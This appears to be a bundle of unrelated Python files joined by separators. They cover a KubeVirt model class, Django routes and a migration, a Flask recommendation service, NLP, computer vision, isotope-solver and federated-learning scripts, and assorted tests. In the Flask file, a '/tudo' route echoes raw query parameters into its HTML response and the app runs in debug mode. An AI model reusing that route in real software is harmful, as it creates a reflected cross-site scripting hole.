:param batch_eviction_size: The batch_eviction_size of this V1KubeVirtWorkloadUpdateStrategy.
:type: int
"""
self._batch_eviction_size = batch_eviction_size
@property
def workload_update_methods(self):
"""
Gets the workload_update_methods of this V1KubeVirtWorkloadUpdateStrategy.
WorkloadUpdateMethods defines the methods that can be used to disrupt workloads during automated workload updates. When multiple methods are present, the least disruptive method takes precedence over more disruptive methods. For example if both LiveMigrate and Shutdown methods are listed, only VMs which are not live migratable will be restarted/shutdown An empty list defaults to no automated workload updating
:return: The workload_update_methods of this V1KubeVirtWorkloadUpdateStrategy.
:rtype: list[str]
"""
return self._workload_update_methods
@workload_update_methods.setter
def workload_update_methods(self, workload_update_methods):
"""
Sets the workload_update_methods of this V1KubeVirtWorkloadUpdateStrategy.
WorkloadUpdateMethods defines the methods that can be used to disrupt workloads during automated workload updates. When multiple methods are present, the least disruptive method takes precedence over more disruptive methods. For example if both LiveMigrate and Shutdown methods are listed, only VMs which are not live migratable will be restarted/shutdown An empty list defaults to no automated workload updating
:param workload_update_methods: The workload_update_methods of this V1KubeVirtWorkloadUpdateStrategy.
:type: list[str]
"""
self._workload_update_methods = workload_update_methods
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1KubeVirtWorkloadUpdateStrategy):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
from django.conf.urls import url
from django.views.generic import TemplateView
from . import views
urlpatterns = [
url(r"^l(?P<line_pk>\d+)/p(?P<part_pk>\d+)/modifications/add/$", views.CreateStoryPart.as_view(view_mode="mod"), name="story_detail_line_part_modification_add"),
url(r"^l(?P<line_pk>\d+)/p(?P<part_pk>\d+)/modifications/$", views.DetailStoryLineModifications.as_view(), name="story_detail_line_part_modifications"),
url(r"^l(?P<line_pk>\d+)/p(?P<part_pk>\d+)/variants/add/$", views.CreateStoryPart.as_view(view_mode="variant"), name="story_detail_line_part_variant_add"),
url(r"^l(?P<line_pk>\d+)/p(?P<part_pk>\d+)/variants/$", views.DetailStoryLineVariants.as_view(), name="story_detail_line_part_variants"),
url(r"^l(?P<line_pk>\d+)/p(?P<part_pk>\d+)/next/$", views.CreateStoryPart.as_view(view_mode="next"), name="story_detail_line_part_next"),
url(r"^l(?P<line_pk>\d+)/$", views.DetailStoryLine.as_view(), name="story_detail_line"),
url(r"^s(?P<story_pk>\d+)/edit/$", views.EditStory.as_view(), name="story_edit"),
url(r"^s(?P<story_pk>\d+)/$", views.DetailStory.as_view(), name="story_detail"),
url(r"^list/$", views.ListStories.as_view(), name="story_list"),
url(r"^add/$", views.CreateStory.as_view(), name="story_create"),
url(r"^$", TemplateView.as_view(template_name="story/index.html"), name="story_index"),
] |
#-*- coding: utf8 -*-
from flask import Flask, render_template, make_response, session, redirect, url_for, escape, request,jsonify,Response
import __builtin__, datetime
from dateutil import parser
import time as T, networkx as x, json # json.dumps
import cPickle as pickle, string
from SPARQLWrapper import SPARQLWrapper, JSON
atime=T.time()
from configuracao import *
from auxiliar import *
try:
__builtin__.g=pickle.load( open( "pickledir/g.p", "rb" ) )
__builtin__.d=pickle.load( open( "pickledir/d.p", "rb" ) )
__builtin__.bow=pickle.load( open( "pickledir/bow.p", "rb" ) )
__builtin__.radicais_escolhidos=pickle.load( open( "pickledir/radicais_escolhidos.p", "rb" ) )
__builtin__.bows=pickle.load( open( "pickledir/bows.p", "rb" ) )
print(T.time()-atime)
except:
fazRedeAmizades()
print(T.time()-atime)
fazRedeInteracao()
print(T.time()-atime)
fazBoW()
print(T.time()-atime)
fazBoWs()
print(T.time()-atime)
import rotinasRecomendacao
app = Flask(__name__)
@app.route("/hello2/")
def foo():
return "bar3"
@app.route("/hello5/")
def foo2():
return "bar5"
@app.route("/atualiza/")
def atualiza():
atime=T.time()
foo=""
fazRedeAmizades()
foo+=str(T.time()-atime)
fazRedeInteracao()
foo+="<br />"+str(T.time()-atime)
fazBoW()
foo+="<br />"+str(T.time()-atime)
fazBoWs()
foo+="<br />"+str(T.time()-atime)
return "atualizado!"+foo
@app.route("/tudo")
def tudo():
return "tudo"+request.args.get("coisa")+request.args["aquela"]
@app.route("/recomenda/")
def recomenda():
"""Implementa recomendação de recursos para o participa.
Parâmetros:
==========
recurso: o recurso a ser recomendado: participantes, comunidades, trilhas, artigos ou comentários.
destinatário: para quem está sendo feita a recomendação: participante, comunidade ou linha_editorial. Campo auxiliar ``idd'' para id do destinatário (comunidade ou participante). É identifier da tabela profiles.
método: método para a recomendação: top(ológico), tex(tual) ou hib(rido). Campo auxiliar de polaridade sim(ilar), dis(similar) ou mis(ta).
Exemplo:
=======
http://<urlDoServidor>/recomenda?recurso=participante&destinatario=comunidade&idd=mirosc&metodo=topologico&polaridade=mis&ordenacao=intercalada"""
# recomendar perfil para perfil
recurso= request.args.get("recurso")
destinatario=request.args.get("destinatario")
idd= request.args.get("idd")
metodo= request.args.get("metodo")
polaridade= request.args.get("polaridade")
ordenacao= request.args.get("ordenacao")
if recurso=="participante":
rec=rotinasRecomendacao.recomendaParticipante(destinatario,idd,metodo,polaridade)
if recurso=="comunidade":
rec=rotinasRecomendacao.recomendaComunidade(destinatario,idd,metodo,polaridade)
if recurso=="trilha":
rec=rotinasRecomendacao.recomendaTrilha(destinatario,idd,metodo,polaridade)
if recurso=="artigo":
rec=rotinasRecomendacao.recomendaArtigo(destinatario,idd,metodo,polaridade)
if recurso=="comentario":
rec=rotinasRecomendacao.recomendaComentario(destinatario,idd,metodo,polaridade)
return json.dumps(rec)
if __name__ == "__main__":
app.debug = True
print T.time()-atime
#app.run(host='0.0.0.0.0')
#app.run(host='localhost',port=83)
#app.run(host='127.0.0.1',port=84)
app.run(host='127.0.0.1',port=884)
|
# -*- coding: utf-8 -*-
"""Parts-of-speech tagger implementations."""
from __future__ import absolute_import
import nltk
import textblob.compat
import textblob as tb
from textblob.en import tag as pattern_tag
from textblob.decorators import requires_nltk_corpus
from textblob.base import BaseTagger
class PatternTagger(BaseTagger):
"""Tagger that uses the implementation in
Tom de Smedt's pattern library
(http://www.clips.ua.ac.be/pattern).
"""
def tag(self, text, tokenize=True):
"""Tag a string or BaseBlob."""
if not isinstance(text, textblob.compat.text_type):
text = text.raw
return pattern_tag(text, tokenize)
class NLTKTagger(BaseTagger):
"""Tagger that uses NLTK's standard TreeBank tagger.
NOTE: Requires numpy. Not yet supported with PyPy.
"""
@requires_nltk_corpus
def tag(self, text):
"""Tag a string or BaseBlob."""
if isinstance(text, textblob.compat.text_type):
text = tb.TextBlob(text)
return nltk.tag.pos_tag(text.tokens)
|
# Generated by Django 2.1.5 on 2019-01-10 21:18
from django.db import migrations
import os
import csv
#Locate csv file to import
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
CAT_FILE = os.path.join(BASE_DIR, 'art_data.csv')
def insert_categories(apps, schema_editor):
Category = apps.get_model('core', 'Category')
categories = list(Category.objects.all().values_list('name', flat=True))
with open(CAT_FILE, mode='r') as csv_file:
csv_reader = csv.DictReader(csv_file)
for row in csv_reader:
if row['classification'] not in categories:
Category.objects.create(name=row['classification'])
categories.append(row['classification'])
class Migration(migrations.Migration):
dependencies = [
('core', '0012_auto_20190109_2235'),
]
operations = [
migrations.RunPython(insert_categories)
]
|
"""CFNgin hook for cleaning up resources prior to CFN stack deletion."""
# pylint: disable=unused-argument
# TODO move to runway.cfngin.hooks on next major release
import logging
LOGGER = logging.getLogger(__name__)
def delete_param(context, provider, **kwargs):
"""Delete SSM parameter."""
parameter_name = kwargs.get("parameter_name")
if not parameter_name:
raise ValueError("Must specify `parameter_name` for delete_param hook.")
session = context.get_session()
ssm_client = session.client("ssm")
try:
ssm_client.delete_parameter(Name=parameter_name)
except ssm_client.exceptions.ParameterNotFound:
LOGGER.info('parameter "%s" does not exist', parameter_name)
return True
|
import numpy as np
from imantics import Polygons, Mask
import cv2
from csv import reader
import os
import json
image_folder = "C:\\Users\\Admin\\Documents\\open-images-1\\train_resized"
coco_dict = {}
coco_dict['images'] = []
coco_dict['annotations'] = []
coco_dict['categories'] = []
with open('C:\\Users\\Admin\\Documents\\open-images-1\\challenge-2019-train-segmentation-masks.csv') as read_obj:
csv_reader = reader(read_obj)
csv_list = list(csv_reader)
with open('C:\\Users\\Admin\\Documents\\open-images-1\\challenge-2019-classes-description-segmentable.csv') as read_obj:
csv_cat_reader = reader(read_obj)
cat_list = list(csv_cat_reader)
for image_file in os.listdir(image_folder):
image = cv2.imread(image_folder + '\\'+ image_file)
height = image.shape[0]
width = image.shape[1]
image_id = os.path.splitext(image_file)[0]
#print(image_id)
for i in range(len(csv_list)):
if csv_list[i][1] == image_id:
mask_image_path = csv_list[i][0]
label_name = csv_list[i][2]
x_min_rel = float(csv_list[i][4])
x_max_rel = float(csv_list[i][5])
y_min_rel = float(csv_list[i][6])
y_max_rel = float(csv_list[i][7])
x_min = x_min_rel * width
y_min = y_min_rel * height
x_max = x_max_rel * width
y_max = y_max_rel * height
mask_image = cv2.imread('C:\\Users\\Admin\\Documents\\open-images-1\\masks' + '\\' + mask_image_path, 0)
idx = os.path.splitext(mask_image_path)[0]
print(idx)
polygons = Mask(mask_image).polygons()
coco_dict['annotations'].append({
'id': idx,
'image_id': image_id,
'category_id': label_name,
'segmentation': polygons.segmentation,
#'bbox': [float(x_min), float(y_min), bbox_width, bbox_height],
'bbox': [float(x_min),float(y_min),float(x_max),float(y_max)],
'iscrowd': 0
})
coco_dict['images'].append({
'file_name': str(image_file),
'height': height,
'width': width,
'id': image_id
})
for i in range(len(cat_list)):
coco_dict['categories'].append({
'id': cat_list[i][0],
'name': str(cat_list[i][1]),
'supercategory': str(cat_list[i][1])
})
with open('train_1_XYXY.json', 'w') as fp:
json.dump(coco_dict, fp)
|
from typing import Tuple
import numpy as np
from shapely.geometry import LineString, Polygon
def _get_boundingbox(centroid: np.ndarray, yaw: float, extent: np.ndarray) -> Polygon:
x, y = centroid[0], centroid[1]
sin, cos = np.sin(yaw), np.cos(yaw)
width, length = extent[0] / 2, extent[1] / 2
x1, y1 = (x + width * cos - length * sin, y + width * sin + length * cos)
x2, y2 = (x + width * cos + length * sin, y + width * sin - length * cos)
x3, y3 = (x - width * cos + length * sin, y - width * sin - length * cos)
x4, y4 = (x - width * cos - length * sin, y - width * sin + length * cos)
return Polygon([[x1, y1], [x2, y2], [x3, y3], [x4, y4]])
def _get_sides(bbox: Polygon) -> Tuple[LineString, LineString, LineString, LineString]:
(x1, y1), (x2, y2), (x3, y3), (x4, y4) = bbox.exterior.coords[:-1]
return (
LineString([(x1, y1), (x2, y2)]),
LineString([(x3, y3), (x4, y4)]),
LineString([(x1, y1), (x4, y4)]),
LineString([(x2, y2), (x3, y3)]),
)
def within_range(ego_centroid: np.ndarray, ego_extent: np.ndarray, agents: np.ndarray) -> np.ndarray:
agent_centroids = agents["centroid"]
agent_extents = agents["extent"]
distance = np.linalg.norm(ego_centroid - agent_centroids, axis=-1)
max_range = 0.5 * (np.linalg.norm(ego_extent[:2]) + np.linalg.norm(agent_extents[:, 2], axis=-1))
return agents[distance < max_range]
def detect_collision(
pred_centroid: np.ndarray, pred_yaw: float, pred_extent: np.ndarray, target_agents: np.ndarray
) -> Tuple[str, str]:
"""
Computes whether a collision occurred between ego and any another agent.
Also computes the type of collision: rear, front, or side.
For this, we compute the intersection of ego's four sides with a target
agent and measure the length of this intersection. A collision
is classified into a class, if the corresponding length is maximal,
i.e. a front collision exhibits the longest intersection with
egos front edge.
"""
ego_bbox = _get_boundingbox(centroid=pred_centroid, yaw=pred_yaw, extent=pred_extent)
for agent in within_range(pred_centroid, pred_extent, target_agents):
agent_bbox = _get_boundingbox(agent["centroid"], agent["yaw"], agent["extent"])
if ego_bbox.intersects(agent_bbox):
front_side, rear_side, left_side, right_side = _get_sides(ego_bbox)
intersection_length_per_side = np.asarray(
[
agent_bbox.intersection(front_side).length,
agent_bbox.intersection(rear_side).length,
agent_bbox.intersection(left_side).length,
agent_bbox.intersection(right_side).length,
]
)
collision_type = ["front", "rear", "side", "side"][np.argmax(intersection_length_per_side)]
return collision_type, agent["track_id"]
return "", ""
|
valorhora= 20000
horastrabajadas=120
horasextra=10
valorhoraextra=((valorhora*0.25)+valorhora)
recibidoporhoraextra=(valorhoraextra*horasextra)
sueldobase=(valorhora*horastrabajadas)
print("El sueldo base del empleado es de:", str(sueldobase),"pesos.")
deducciones=(sueldobase*0.14)
Sueldomenosdeducciones=(sueldobase-deducciones)
print("El sueldo base menos las deducciones es de:", str(Sueldomenosdeducciones),"pesos.")
Actualizaciónacademica=250000
total1=(Sueldomenosdeducciones+Actualizaciónacademica)
print("Añadiendo la actualización académica de 250.000 pesos:", str(total1),"pesos.")
dinerohijos=(3*173000)
total2=(total1+dinerohijos)
print("Añadiendo subsidio para los 3 hijos:", str(total2), "pesos.")
bonohogar=180000
total3=(total2+bonohogar)
print("Añadiendo el bono Hogar", str(total3),"pesos.")
total4=(total3+recibidoporhoraextra)
print("Más las horas extra trabajadas el salario neto sería de:", str(total4), "pesos.") |
"""Support for Alexa skill service end point."""
import logging
import voluptuous as vol
from homeassistant.const import CONF_NAME
from homeassistant.core import callback
from homeassistant.helpers import config_validation as cv, entityfilter
from . import flash_briefings, intent, smart_home_http
from .const import (
CONF_AUDIO,
CONF_CLIENT_ID,
CONF_CLIENT_SECRET,
CONF_DESCRIPTION,
CONF_DISPLAY_CATEGORIES,
CONF_DISPLAY_URL,
CONF_ENDPOINT,
CONF_ENTITY_CONFIG,
CONF_FILTER,
CONF_LOCALE,
CONF_SUPPORTED_LOCALES,
CONF_TEXT,
CONF_TITLE,
CONF_UID,
DOMAIN,
EVENT_ALEXA_SMART_HOME,
)
_LOGGER = logging.getLogger(__name__)
CONF_FLASH_BRIEFINGS = "flash_briefings"
CONF_SMART_HOME = "smart_home"
DEFAULT_LOCALE = "en-US"
ALEXA_ENTITY_SCHEMA = vol.Schema(
{
vol.Optional(CONF_DESCRIPTION): cv.string,
vol.Optional(CONF_DISPLAY_CATEGORIES): cv.string,
vol.Optional(CONF_NAME): cv.string,
}
)
SMART_HOME_SCHEMA = vol.Schema(
{
vol.Optional(CONF_ENDPOINT): cv.string,
vol.Optional(CONF_CLIENT_ID): cv.string,
vol.Optional(CONF_CLIENT_SECRET): cv.string,
vol.Optional(CONF_LOCALE, default=DEFAULT_LOCALE): vol.In(
CONF_SUPPORTED_LOCALES
),
vol.Optional(CONF_FILTER, default={}): entityfilter.FILTER_SCHEMA,
vol.Optional(CONF_ENTITY_CONFIG): {cv.entity_id: ALEXA_ENTITY_SCHEMA},
}
)
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: {
CONF_FLASH_BRIEFINGS: {
cv.string: vol.All(
cv.ensure_list,
[
{
vol.Optional(CONF_UID): cv.string,
vol.Required(CONF_TITLE): cv.template,
vol.Optional(CONF_AUDIO): cv.template,
vol.Required(CONF_TEXT, default=""): cv.template,
vol.Optional(CONF_DISPLAY_URL): cv.template,
}
],
)
},
# vol.Optional here would mean we couldn't distinguish between an empty
# smart_home: and none at all.
CONF_SMART_HOME: vol.Any(SMART_HOME_SCHEMA, None),
}
},
extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass, config):
"""Activate the Alexa component."""
@callback
def async_describe_logbook_event(event):
"""Describe a logbook event."""
data = event.data
entity_id = data["request"].get("entity_id")
if entity_id:
state = hass.states.get(entity_id)
name = state.name if state else entity_id
message = f"send command {data['request']['namespace']}/{data['request']['name']} for {name}"
else:
message = (
f"send command {data['request']['namespace']}/{data['request']['name']}"
)
return {
"name": "Amazon Alexa",
"message": message,
"entity_id": entity_id,
}
hass.components.logbook.async_describe_event(
DOMAIN, EVENT_ALEXA_SMART_HOME, async_describe_logbook_event
)
if DOMAIN not in config:
return True
config = config[DOMAIN]
flash_briefings_config = config.get(CONF_FLASH_BRIEFINGS)
intent.async_setup(hass)
if flash_briefings_config:
flash_briefings.async_setup(hass, flash_briefings_config)
try:
smart_home_config = config[CONF_SMART_HOME]
except KeyError:
pass
else:
smart_home_config = smart_home_config or SMART_HOME_SCHEMA({})
await smart_home_http.async_setup(hass, smart_home_config)
return True
|
"""
This solver implements the double spike equations from the
double-spike toolbox. Other places too, but that's the most popular
reference. Code by Alex Tennant.
Questions to alexpattennant@gmail.com
"""
import numpy as np
from numpy import warnings
from scipy.optimize import fsolve
from scipy.optimize import least_squares
import math
def UseAnneal(Sample, Spike, Standard, Mass, RatioMass, p):
# print(Sample)
# print()
# print(Spike)
# print()
# print(Standard)
# print()
# print(Mass)
# print()
# print(p)
# print()
def equation(x):
equation = np.array([Standard[i]*(Mass[i]/RatioMass)**(-x[0])*x[2]+
Spike[i]*(1-x[2])-
Sample[i]*(Mass[i]/RatioMass)**(-x[1]) for i in range(len(Spike))])
return equation
try:
Result = least_squares(lambda x: equation(x),x0=p)
x = Result.x
success = True
alpha = x[0]
beta = x[1]
lamb = x[2]
return alpha, beta, lamb, success
except RuntimeWarning:
alpha= "NoConvergence"
beta = "No Convergence"
lamb = "No Convergence"
success = False
return alpha, beta, lamb, success
def DSpikeSolve(Sample, Spike, Standard, Mass, RatioMass, Anneal=False):
"""
This solves the non-linear double spike equations and uses
the linearized method as an intial guess at the system
Sample is the ratios of the measured sample
Spike is the known spike ratios,
Standard is the known standard ratios
Mass is the known mass of the element,
Ratio mass is the mass of the denominator in the ratio,
AmtDS is an optional paramenter of the amount of double spike added
to calculate concentration of sample by isotope dilution
"""
# Linear system first
A = np.matrix(
[[Spike[i] - Standard[i],
-Standard[i] * math.log(Mass[i]/RatioMass),
Sample[i] * math.log(Mass[i]/RatioMass)] for i in range(len(Spike))])
b = np.array([Sample[i] - Standard[i] for i in range(len(Spike))])
x = np.linalg.solve(A,b)
x1 = [x.item(0),x.item(1),x.item(2)]
# Initial guess
p = [(x1[1]/(1-x1[0])),x1[2],1-x1[0]]
# Double Spike equations
def equation(x):
equation = np.array([Standard[i]*(Mass[i]/RatioMass)**(-x[0])*x[2]+
Spike[i]*(1-x[2])-
Sample[i]*(Mass[i]/RatioMass)**(-x[1]) for i in range(len(Spike))])
return equation
warnings.simplefilter("error", RuntimeWarning)
try:
# Begin root finding
alpha,beta,lamb = fsolve(lambda x: equation(x),x0=p,xtol=1e-10, maxfev= 10000, factor = 0.5)
success = True
print(Sample, "I AM SAMPLE")
print(Standard, "I AM STANDARD")
print(Spike, "I AM SPIKE")
print(p, "I AM INITIAL")
print()
return alpha, beta, lamb, success
except RuntimeWarning:
alpha = "No Convergence"
beta = "No Convergence"
lamb = "No Convergence"
success = False
return alpha, beta, lamb, success
def ConcentrationCalculation(alpha, alpha2, Standard, Spike, Mass, RatioMass, ADS, PercentSpike):
# Add up ratios of standard and spike to calculate our
# own molar mass.
S = 1.0
T = 1.0
Sample = [0 for i in range(len(Standard))]
for i in range(len(Standard)):
S += float(Standard[i])
T += float(Spike[i])
Sample[i] = float(Standard[i]) * (float(Mass[i])/float(RatioMass)) ** (-(alpha - alpha2))
P = [0 for i in range(len(Standard) + 1)]
for i in range(len(Standard)):
P[i] = Sample[i] / S
P[-1] = 1/S
# Atomic weight
AW = 0.0
for i in range(len(P)-1):
AW += P[i] * float(Mass[i])
AW += P[-1] * float(RatioMass)
# Atomic weight of spike
DSAW = 0.0
for i in range(len(Spike)):
DSAW += float(Spike[i]) * float(Mass[i]) / T
DSAW += RatioMass / T
try:
concentration = (ADS/DSAW) * (1/(PercentSpike ) - 1) * AW
except RuntimeWarning:
concentration = "DivByZero"
return concentration
|
import numpy as np
import pytest
from ..flag import (
slice_full_edge_masked,
slice_has_flags,
compute_masked_fraction)
@pytest.mark.parametrize(
'inds',
[(range(10), 0), # left
(range(10), -1), # right
(0, range(10)), # top
(-1, range(10)) # bottom
])
def test_slice_full_edge_masked(inds):
"""Make sure images with fully masked edges are all properly flagged."""
weight = np.ones((10, 10))
bmask = np.zeros((10, 10), dtype=np.int32)
bmask[:, 0] = 4 # try a different flag
bad_flags = np.int32(2**0)
wgt = weight.copy()
wgt[inds] = 0
assert slice_full_edge_masked(
weight=wgt, bmask=bmask, bad_flags=np.int32(0))
bm = bmask.copy()
bm[inds] = 2**0
assert slice_full_edge_masked(
weight=weight, bmask=bm, bad_flags=bad_flags)
@pytest.mark.parametrize(
'inds',
[(5, 0), # left
(5, -1), # right
(0, 5), # top
(-1, 5) # bottom
])
def test_slice_full_edge_masked_one_pix(inds):
"""Make sure if not a fully masked edge, then image is not flagged."""
weight = np.ones((10, 10))
bmask = np.zeros((10, 10), dtype=np.int32)
bad_flags = 2**0
wgt = weight.copy()
wgt[inds] = 0
assert not slice_full_edge_masked(
weight=wgt, bmask=bmask, bad_flags=0)
bm = bmask.copy()
bm[inds] = 2**0
assert not slice_full_edge_masked(
weight=weight, bmask=bm, bad_flags=bad_flags)
def test_compute_masked_fraction():
weight = np.ones((10, 10))
bmask = np.zeros((10, 10), dtype=np.int32)
bad_flags = 2**0
weight[4, 7] = 0.0
bmask[7, 9] = 4 # try a different flag
bmask[8, 2] = 2**0
assert compute_masked_fraction(
weight=weight, bmask=bmask, bad_flags=bad_flags) == 0.02
def test_slice_has_flags():
bmask = np.zeros((10, 10), dtype=np.int32)
flags = 2**0
bmask[6, 7] = 4
assert not slice_has_flags(bmask=bmask, flags=flags)
bmask[6, 6] = 2**0
assert slice_has_flags(bmask=bmask, flags=flags)
def test_compute_masked_fraction_ignore_mask():
weight = np.ones((10, 10))
bmask = np.zeros((10, 10), dtype=np.int32)
bad_flags = 2**0
weight[4, 7] = 0.0
bmask[7, 9] = 4 # try a different flag
bmask[8, 2] = 2**0
bmask[3, 3] = 2**0
ignore_mask = np.zeros_like(bmask).astype(bool)
ignore_mask[3, 3] = 1
assert compute_masked_fraction(
weight=weight,
bmask=bmask,
bad_flags=bad_flags,
ignore_mask=ignore_mask
) == 2/99
def test_compute_masked_fraction_ignore_mask_all():
weight = np.ones((10, 10))
bmask = np.zeros((10, 10), dtype=np.int32)
bad_flags = 2**0
weight[4, 7] = 0.0
bmask[7, 9] = 4 # try a different flag
bmask[8, 2] = 2**0
bmask[3, 3] = 2**0
ignore_mask = np.zeros_like(bmask).astype(bool)
ignore_mask[:, :] = 1
assert compute_masked_fraction(
weight=weight,
bmask=bmask,
bad_flags=bad_flags,
ignore_mask=ignore_mask
) == 1.0
|
# Copyright 2019, OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import typing
from enum import Enum
from .. import Span, SpanProcessor
logger = logging.getLogger(__name__)
class SpanExportResult(Enum):
SUCCESS = 0
FAILED_RETRYABLE = 1
FAILED_NOT_RETRYABLE = 2
class SpanExporter:
"""Interface for exporting spans.
Interface to be implemented by services that want to export recorded in
its own format.
To export data this MUST be registered to the :class`..Tracer` using a
`SimpleExportSpanProcessor` or a `BatchSpanProcessor`.
"""
def export(self, spans: typing.Sequence[Span]) -> "SpanExportResult":
"""Exports a batch of telemetry data.
Args:
spans: The list of `Span`s to be exported
Returns:
The result of the export
"""
def shutdown(self) -> None:
"""Shuts down the exporter.
Called when the SDK is shut down.
"""
class SimpleExportSpanProcessor(SpanProcessor):
"""Simple SpanProcessor implementation.
SimpleExportSpanProcessor is an implementation of `SpanProcessor` that
passes ended spans directly to the configured `SpanExporter`.
"""
def __init__(self, span_exporter: SpanExporter):
self.span_exporter = span_exporter
def on_start(self, span: Span) -> None:
pass
def on_end(self, span: Span) -> None:
try:
self.span_exporter.export((span,))
# pylint: disable=broad-except
except Exception as exc:
logger.warning("Exception while exporting data: %s", exc)
def shutdown(self) -> None:
self.span_exporter.shutdown()
class ConsoleSpanExporter(SpanExporter):
"""Implementation of :class:`SpanExporter` that prints spans to the
console.
This class can be used for diagnostic purposes. It prints the exported
spans to the console STDOUT.
"""
def export(self, spans: typing.Sequence[Span]) -> SpanExportResult:
for span in spans:
print(span)
return SpanExportResult.SUCCESS
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
import unittest
from py_privatekonomi.utilities.common import format_time_struct, is_unicode
from py_privatekonomi.utilities import helper
from py_privatekonomi.core import loader
from py_privatekonomi.core.error import FormatterError, ParserError
from py_privatekonomi.tests.test_base import TestBase
from py_privatekonomi.tests.dataset.avanza.sample1 import test_data as test_data_1
from py_privatekonomi.tests.dataset.avanza.excel_sample import test_data as test_data_excel
class TestAvanza(TestBase):
def setUp(self):
pass
def test_sample1(self):
app = loader.load_app(
app_name='py_privatekonomi.core.apps.default',
sources='samples/avanza/sample1',
parser_name='avanza',
formatter_name='avanza')
results = helper.execute_app(app)
self.assertFormatted(results, test_data_1, format_as_mapper=False)
def test_sample2(self):
""" sample2 is a copy of sample1 containing three empty rows which should be ignored """
app = loader.load_app(
app_name='py_privatekonomi.core.apps.default',
sources='samples/avanza/sample2',
parser_name='avanza',
formatter_name='avanza')
results = helper.execute_app(app)
self.assertFormatted(results, test_data_1, format_as_mapper=False)
def test_invalid_sample1(self):
""" Test invalid transaction file which throws FormatterError """
app = loader.load_app(
app_name='py_privatekonomi.core.apps.default',
sources='samples/invalid/avanza/invalid_sample1',
parser_name='avanza',
formatter_name='avanza')
self.assertRaises(FormatterError, helper.execute_app, app)
def test_invalid_sample2(self):
""" Test invalid transaction file which throws ParserError """
app = loader.load_app(
app_name='py_privatekonomi.core.apps.default',
sources='samples/invalid/avanza/invalid_sample2',
parser_name='avanza',
formatter_name='avanza')
self.assertRaises(FormatterError, helper.execute_app, app)
def test_excel(self):
""" Test valid excel file """
app = loader.load_app(
app_name='py_privatekonomi.core.apps.default',
sources='samples/avanza/excel_sample.xlsx',
parser_name='avanza',
formatter_name='avanza')
results = helper.execute_app(app)
self.assertFormatted(results, test_data_excel, format_as_mapper=False)
if __name__ == '__main__':
unittest.main() |
import yaml
from fed_exchange_weight_bias.client import Clients
from fed_exchange_weight_bias.server import Server
from fed_exchange_weight_bias.utils.logger import initialize_logging, create_federated_logger
with open("parameters.yaml", mode='r', encoding="utf-8") as f:
params = yaml.load(f, Loader=yaml.FullLoader)
if __name__ == "__main__":
dataset = "cars"
model_name = "vgg19"
"""Set hyper-parameters."""
epoch = params["fed_epochs"]
learning_rate = params["learning_rate"]
CLIENTS_NUMBER = params["clients_num"]
# And as federated learning is online,
# participants are uncertain about their online status in each training epoch.
CLIENT_RATIO_PER_ROUND = params["client_ratio_per_round"]
# Some characteristics of the dataset cifar-10.
input_shape = params[dataset]["input_shape"]
classes_num = params[dataset]["classes_num"]
"""Initialize logger."""
initialize_logging(filepath="logs/", filename="federated_learning.log")
federated_logger = create_federated_logger("federated learning")
"""Build clients, server."""
client = Clients(dataset=dataset,
model_name=model_name,
input_shape=input_shape,
classes_num=classes_num,
learning_rate=learning_rate,
clients_num=CLIENTS_NUMBER)
server = Server()
"""Begin training."""
for ep in range(epoch):
# Empty local_parameters_sum at the beginning of each epoch.
server.initialize_local_parameters_sum()
# Choose a random selection of active clients to train in this epoch.
active_clients = client.choose_clients(CLIENT_RATIO_PER_ROUND)
# Train these clients.
for client_id in active_clients:
client.current_cid = client_id
print("[fed-epoch {}] cid: {}".format(ep, client_id))
federated_logger.info("[fed-epoch {}] cid: {}".format(ep, client_id))
client.download_global_parameters(server.global_parameters)
client.train_local_model(train_ratio=params["train_ratio"],
local_epochs=params["local_epochs"],
batch_size=params["batch_size"])
# Accumulate local parameters.
current_local_parameters = client.upload_local_parameters()
server.accumulate_local_parameters(current_local_parameters)
# Update global parameters in each epoch.
server.update_global_parameters(len(active_clients))
|
"""Defines MeltanoInvoker."""
import os
import subprocess
import sys
from pathlib import Path
from .project import Project
from .project_settings_service import ProjectSettingsService, SettingValueStore
MELTANO_COMMAND = "meltano"
class MeltanoInvoker:
def __init__(self, project, settings_service: ProjectSettingsService = None):
self.project = project
self.settings_service = settings_service or ProjectSettingsService(project)
def invoke(self, args, command=MELTANO_COMMAND, env=None, **kwargs):
"""Invoke `meltano` (or provided command) with provided args and env."""
return subprocess.run(
[self._executable_path(command), *args],
**kwargs,
env=self._executable_env(env)
)
def _executable_path(self, command):
if command == MELTANO_COMMAND:
# This symlink is created by Project.activate
executable_symlink = self.project.run_dir().joinpath("bin")
if executable_symlink.exists():
return str(executable_symlink)
executable = Path(os.path.dirname(sys.executable), command)
if executable.exists():
return str(executable)
# Fall back on expecting command to be in the PATH
return command
def _executable_env(self, env=None):
exec_env = {}
# Include env that project settings are evaluated in
exec_env.update(self.settings_service.env)
# Include env for settings explicitly overridden using CLI flags
exec_env.update(
self.settings_service.as_env(source=SettingValueStore.CONFIG_OVERRIDE)
)
# Include explicitly provided env
if env:
exec_env.update(env)
return exec_env
|
import logging
import uuid
from abc import ABCMeta, abstractmethod
from typing import Optional
from great_expectations.exceptions import InvalidKeyError, StoreBackendError, StoreError
